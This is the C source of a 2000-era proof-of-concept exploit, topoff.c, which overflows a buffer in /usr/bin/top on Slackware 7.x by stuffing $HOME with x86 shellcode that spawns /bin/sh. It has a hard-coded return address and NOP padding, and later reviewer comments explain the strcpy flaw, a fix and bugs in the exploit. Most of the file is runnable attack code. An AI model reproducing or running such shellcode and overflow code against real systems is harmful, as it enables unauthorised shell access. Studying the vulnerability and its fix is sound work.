/*
 *
 * topoff.c (08/02/00)
 *
 * Live buffer overflow (stack smasher/breaker/etc..)
 * Exploits /usr/bin/top on Slackware 7.0.0 and 7.1.0.
 * Earlier versions should also be assumed vulnerable.
 *
 * By: Ben Lull (blull@valleylocal.com)
 *
 *
 *
 * <--- Begin my Little Babble --->
 * You know you're bored when you go through utils like top
 * which don't have a sXid bit and spend the time generating
 * the shell code from scratch and all that fun stuff as
 * well as making the code pretty..
 *
 * Note:
 * grep(1) is your friend... example usage:
 * me@synchro~> grep -F -n "str" *.c
 * me@synchro~> grep -F -n "get" *.c
 * me@synchro~> grep -F -n "print" *.c
 * me@synchro~> grep -n "\[\]" *.c | grep -F "char"
 *
 *
 *
 * Experienced working Offsets:
 * (It's obvious, look at the code)
 * BUFLEN - strlen(code) - EIP.
 *
 * You should know this one.
 * If you don't.. you shouldn't
 * Have toys such as this.
 *
 *
 *
 * Exploit Occurs:
 *
 * top.h:
 * 50: #define MAXNAMELEN 1024
 *
 *
 * top.c:
 * 211: char rcfile[MAXNAMELEN];
 *
 * 223: if (getenv("HOME")) {
 * 224: strcpy(rcfile, getenv("HOME"));
 * 225: strcat(rcfile, "/");
 * 226: }
 * .
 * .
 * .
* 1495: if (getenv("HOME")) {
 * 1496: strcpy(rcfile, getenv("HOME"));
 *
 * Reviewer note: the root cause quoted above is an unbounded strcpy() of
 * $HOME into the fixed-size rcfile[MAXNAMELEN] array (1024 bytes per the
 * header); the length of the environment value is never checked. The
 * mitigation is a length-checked copy with a truncation check, e.g.
 * snprintf(rcfile, sizeof rcfile, "%s/", home), and treating environment
 * variables as untrusted input in any program run by another user.
 */

/* Header names were lost in extraction; presumably <stdio.h>, <stdlib.h>
 * and <string.h> (fprintf/printf, malloc/exit/setenv/system/atoi/strtoul,
 * strcmp/strlen) -- confirm against the original source. */
#include
#include

#define OFFSET 0                /* only used to initialise `offset` in main(), which is never read */
#define BUFLEN 1032             /* bytes placed in $HOME; 8 more than top's 1024-byte rcfile */
#define RET 0xbffffb35 /* Slackware 7.1 */
                                /* Hard-coded stack address; only meaningful for a fixed,
                                 * non-randomised stack layout of that specific build. */
//#define RET 0xbffffafc /* Slackware 7.0 */
#define NOP 0x90                /* x86 single-byte no-op, used as padding below */
#define TOP "/usr/bin/top"      /* program handed to system() at the end of main() */

/* Payload bytes: raw machine code (the string "/bin/sh" appears at
 * "\x2f\x62\x69\x6e\x2f\x73\x68", followed by a "\x00" byte) and then
 * 0x90 padding. Not analysed further here. Note that strlen(code), used
 * in main(), measures only up to that first embedded NUL, not sizeof code - 1. */
char code[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\xc9\xc3"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90";

/* Print the command-line synopsis to stderr and exit(1).
 * `arg` is argv[0] and is only ever passed as a %s argument, never as a
 * format string. Does not return. */
void usage(char *arg) {
    fprintf(stderr, "\nUsage: %s [offset up/down] [eip]\n\n", arg);
    fprintf(stderr, "Examples:\n");
    fprintf(stderr, "\t%s 347 up -=- Default EIP increased by 347 bytes\n", arg);
    fprintf(stderr, "\t%s 347 down -=- Default EIP decreased by 347 bytes\n", arg);
    fprintf(stderr, "\t%s 429 up 0xbffffad8 -=- EIP set to 0xbffffad8 and increased by 429 bytes\n", arg);
    fprintf(stderr, "\t%s 429 down 0xbffffad8 -=- EIP set to 0xbffffad8 and decreased by 429 bytes\n\n", arg);
    exit(1);
}

/* Entry point.
 * argv[1]: decimal adjustment (parsed with atoi, so malformed input silently
 *          becomes 0 -- strtol with an endptr check would report it).
 * argv[2]: "up" or "down".
 * argv[3]: optional base address in hex (strtoul, base 16), replacing RET.
 * Builds a BUFLEN-byte value, installs it as $HOME and runs TOP via system().
 * Returns nothing explicitly: fine under C99 (implicit return 0 from main),
 * unspecified under C89. */
int main(int argc, char *argv[]) {
    char *buf, *p;
    long *addressp, address;        /* `address` is assigned only inside the strcmp()
                                     * branches below; if argv[2] is neither "up" nor
                                     * "down" it is read uninitialised later (UB). */
    int offset=OFFSET;              /* never read */
    int i;

    if((argc < 3) || (argc > 4)) usage(argv[0]);

    /* Three arguments: adjust the built-in RET constant. */
    if(argc == 3) {
        if(!strcmp(argv[2], "up")) {
            address = RET + atoi(argv[1]);
            printf("Increasing offset by: %d\n", atoi(argv[1]));
            printf("Increasing EIP to: 0x%x\n\n", RET + atoi(argv[1]));
        }
        if(!strcmp(argv[2], "down")) {
            address = RET - atoi(argv[1]);
            printf("Decreasing offset by: %d\n", atoi(argv[1]));
            printf("Decreasing EIP to: 0x%x\n\n", RET - atoi(argv[1]));
        }
    }
    /* Four arguments: argv[3] supplies the base address instead of RET.
     * strtoul() returns unsigned long, so "%x" is a format mismatch on LP64
     * targets (harmless on the 32-bit systems this was written for); "%lx"
     * would be the matching specifier. */
    if(argc >= 4) {
        if(!strcmp(argv[2], "up")) {
            address = strtoul(argv[3], NULL, 16) + atoi(argv[1]);
            printf("Setting EIP to: 0x%x\n", strtoul(argv[3], NULL, 16));
            printf("Increasing offset by: %d\n", atoi(argv[1]));
            printf("Increasing EIP to: 0x%x\n\n", (strtoul(argv[3], NULL, 16) + atoi(argv[1])));
        }
        if(!strcmp(argv[2], "down")) {
            address = strtoul(argv[3], NULL, 16) + atoi(argv[1]);
            printf("Setting EIP to: 0x%x\n", strtoul(argv[3], NULL, 16));
            printf("Decreasing offset by: %d\n", atoi(argv[1]));
            printf("Decreasing EIP to: 0x%x\n\n", (strtoul(argv[3], NULL, 16) - atoi(argv[1])));
        }
    }

    /* malloc() needs no cast in C; the cast here is harmless but non-idiomatic. */
    if (!(buf = (char *)malloc(BUFLEN))) {
        printf("Can't allocate memory.\n");
        exit(-1);
    }

    /* Pass 1: store `address` repeatedly across the whole buffer. Each store
     * writes sizeof(long) bytes but `i` advances by 4, so this assumes a
     * 32-bit long; on an LP64 target the loop would write 258 * 8 = 2064
     * bytes into a 1032-byte heap block. */
    p = buf;
    addressp = (long *) p;
    for (i = 0; i < BUFLEN; i+=4) {
        *(addressp++) = address;
    }
    /* Pass 2: overwrite the leading part with NOP padding. `i` is int and the
     * bound is size_t (strlen), so the comparison is done unsigned. */
    for (i = 0; i < (BUFLEN - strlen(code) - 4); i++) {
        buf[i] = NOP;
    }
    /* Pass 3: copy strlen(code) bytes of the payload after the padding. */
    p = buf + (BUFLEN - strlen(code) - 4);
    for (i = 0; i < strlen(code); i++)
        *(p++) = code[i];
    /* Off-by-one: index BUFLEN is one past the end of the malloc(BUFLEN) block,
     * so this is an out-of-bounds heap write (UB); the last in-bounds index is
     * BUFLEN - 1. No byte inside the block is guaranteed to be zero, so setenv()
     * below may also read past the block looking for a terminator. */
    buf[BUFLEN] = '\0';

    /*
     * A nifty trick is to run /bin/sh -i and run top manually.
     * This way you can figure out if you're going the right way or not
     *
     * strace/gdb /usr/bin/top
     *
     */
    /* Install the buffer as $HOME (overwriting any existing value) and run
     * TOP through system(), i.e. via "/bin/sh -c", which inherits the
     * modified environment. Neither return value is checked. */
    setenv("HOME", buf, 1);
    system(TOP);
}
/* www.hack.co.za [21 August 2000]*/